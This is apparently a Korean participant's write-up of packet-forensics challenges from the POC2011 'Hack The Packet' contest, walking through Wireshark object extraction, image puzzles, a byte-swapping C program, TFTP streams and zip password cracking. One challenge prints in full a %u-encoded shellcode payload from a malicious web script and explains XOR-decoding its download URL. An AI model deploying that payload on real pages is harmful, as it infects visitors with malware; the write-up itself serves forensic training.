POC "Power of Community" 이민우 (lwmr)

POC2011 - "Power of Community" 이민우 (lwmr) pmskylove@gmail.com

L_01 Q : 지성이는홈쇼핑을하다이상한페이지에접속하여악성코드에감염되었다! 악성스크립트에포함되어있는쉘코드가다운로드하는 URL 을찾아라! Twitter 의 2mart 라는힌트를보고 WireShark 의 File Export -> Objects -> HTTP 을통해 Shop 을저장해메모장으로열어보면악성코드가보입니다 payload= '%u5858%u5858%u10eb%u4b5b%uc933%ub966%u03b8%u3480%ubd0b%ufae2%u05eb%uebe8% uffff%u54ff%ubea3%ubdbd%ud9e2%u8d1c%ubdbd%u36bd%ub1fd%ucd36%u10a1%ud536 %u36b5%ud74a%ue4ac%u0355%ubdbf%u2dbd%u455f%u8ed5%ubd8f%ud5bd%ucee8%ucfd 8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D 2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD 0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8 ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%u BFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7 %ud7ee%u42bd%ue1eb%u7d8e%u3dfd%ube81%uc8bd%u7a44%ubeb9%udbe1%ud893%uf97a %ub9be%ud8c5%ubdbd%u748e%uecec%ueaee%u8eec%u367d%ue5fb%u9f55%ubdbc%u3ebd %ubd45%u1e54%ubdbd%u2dbd%ubdd7%ubdd7%ubed7%ubdd7%ubfd7%ubdd5%ubdbd%ue E7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%u D7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA 2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD4 2%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB 7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D% ubdbd%ubdd7%uf330%uecc9%ucb42%uedcd%ucb42%u42dd%u8deb%ucb42%u42dd%u89eb %ucb42%u42c5%ufdeb%u4636%u7d8e%u668e%u513c%ubfbd%ubdbd%u7136%u453e%uc0e9

%u34b5%ubca1%u7d3e%u56b9%u364e%u3671%u3e64%uad7e%u7d8e%ueced%uedee%ueded %ueded%ueaed%ueded%ueb42%u36b5%ue9c3%uad55%ubdbc%u55bd%ubdd8%ubdbd%ude D5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uB DB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD% uee66%ueeee%u42ee%u3d6d%u5585%u853d%uc854%u3cac%ub8c5%u2d2d%u2d2d%ub5c9% u4236%u36e8%u3051%ub8fd%u5d42%u1b55%ubdbd%u7ebd%u1d55%ubdbd%u05bd%ubcac %u3db9%ub17f%u55bd%ubd2e%ubdbd%u513c%ubcbd%ubdbd%u4136%u7a3e%u7ab9%u8fb A%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC20 7%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1 FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u1 0A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%u CEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u4 28E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8F A%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE5 42%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10 %u8e78%ub266%uad03%u6b87%ub5c9%u767c%ubeba%ufd67%u4c56%ua286%u5ac8%u36e3 %u99e3%u60be%u36db%uf6b1%ue336%ubea1%u3660%u36b9%u78be%ue316%u7ee4%u6055%u 4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C 34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A 4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0 %u0584%u69d4%u03a6%udbc2%u411d%u8a14%u2510%uadb7%u3d45%u126b%u4627%ua8ee %ud5db%uc9c9%u87cd%u9292%ucaca%u93ca%uc5c9%uf7da%u93f7%ud2de%u92d0%ud0d4%ud adc%uced8%uce92%ud893%ud8c5%ubdbd%ubdbd%ueaea%ueaea%ueaea%ueaea'; Malzila 을이용했는데 malware hunting tool 이기때문에문제에적합한툴이였고, KISA 오픈 소스툴찾기대회때이툴로상을받아서사용법을알고있었고 ISEC2011 에서문제를푸는데 사용해봤던적도있어서쉽게풀수있었습니다.

먼저해당 payload 을 Hex 값으로바꿔주면밑에그림과같이 Hex 값으로바꿔줍니다 이 HEX 값을 Paste as hex 을통해복사해놓으면밑에그림과같이되는데

URL 을찾는문제였기때문에 www 을넣어봤는데 key 값이 2f 가나왔는데되지않았고 http 을넣었을때 key 값인 92 로 xor 을해주니맨밑에 URL 을찾을수있었습니다 L_03 Q : 착이가 POC 사이트에접속했을때, 웹서버의시갂은? WireShark 의 File Export -> Objects -> HTTP 을통해 Powerofcommunity.net 사이트의 패킷번호 15 번을확인하고 Follow TCP Stream 을하면

Mon, 17 Oct 2011 09:24:22 GMT 라는키값이보입니다. M_01 Q : GRAN PLAZA 로향하는출발지를찾아라. 맵을완성하고나면경로를찾을수 있을것이다. 정답은출발지건물의이름이다. WireShark 의 File Export -> Objects -> HTTP -> Save All 을해서지도그림만뽑아낸후

지도퍼즐을맞추고보면 GRAN PLAZA 출발지는 Clinica dental Dr. Calvo 임을알수있었습니다 M_03 Q. 이럴수가도시가뒤집어졌어!!! 자네이도시를다시돌려주게! WireShark 의 File Export -> Objects -> HTTP -> Save All 해서뒤집어진집그림을뽑아낸후

살펴보니 Hex 값을뒤집어주는문제였습니다. 예젂에이런문제류를보았었고얼마젂에진행한 순천향대정보보호페스티벌에서도비슷한문제가있어서사용했던약갂지저분한소스코드로쉬 우면서도힘겹게풀수있었습니다. // 헤더부분생략 void main () { int i=0; char str1[100000]={0}; char temp; char * str1_ptr=str1; FILE* fp=null; FILE* fp2=null; size_t n_size=0; size_t total_size=0; char buff[1024]={0}; fp=fopen("c:\\users\\lwmr\\desktop\\a.txt","r"); if (fp==null) { printf(" 파일열기실패 \n"); return; } while (0 < (n_size=fread(buff,sizeof(char),1024,fp))) { memcpy(str1_ptr,buff,n_size); str1_ptr+=n_size; total_size+=n_size; } fclose(fp); for (i=0;i<total_size;i+=3) {

temp=str1[i]; str1[i]=str1[i+1]; str1[i+1]=temp; } printf ("total_size = %d, str1[total_size-1] = %c \n", total_size, str1[total_size-1]); fp2=fopen("c:\\users\\lwmr\\desktop\\output2.txt","w"); fwrite(str1,sizeof(char),total_size,fp2); fclose(fp2); return; } 각사진마다작업후사진들을합쳐보면키가보입니다

M_04 Q : 산수좀하나? WireShark 의 File Export -> Objects -> HTTP 을통해 kkk.jpg 파일을저장해서보면 다음과같은그림파일의덧셈문제가나오는데, 계산과정에서잘보이지않아계산이자꾸틀려 포토샵을이용해다음과같이조젃해계산을하면 key : 7658 H_03 Q. Hack The Packet 대회 Cisco Router 가해킹당했다. Router 가설정파일과 IOS 이미지등을받아올때 TFTP 라는비연결형파일젂송프로토콜을이용 함을알아내어패킷에서 TFTP 프로토콜을사용하는목록이다음과같아 보이는 5 개의패킷을모두 UDP Stream 해서보니모든패킷에키값이적혀있었습니다..

H_04 Q. Buddy Buddy, zip file 패킷에서 buddybuddy 에해당하는패킷이 3 개있었는데 zip 파일을추출하지못해 문제 pcap 파일을 hex editor 로열어압축파일인 PK(50 4B 03) 를검색하는도중많은 PK strings 중에 PK 밑에 KEY 라는부분이보여이부분을만들어보면 압축파일이만들어지는데암호가걸려있습니다 AAPR.v4.53 을이용해크랙을하면키패스워드가 0.5 초.. 만에나옵니다 1018 패스워드를넣어주고압축을풀고 key 파일을읽으면 Key:YOU_Don'T_Know_ME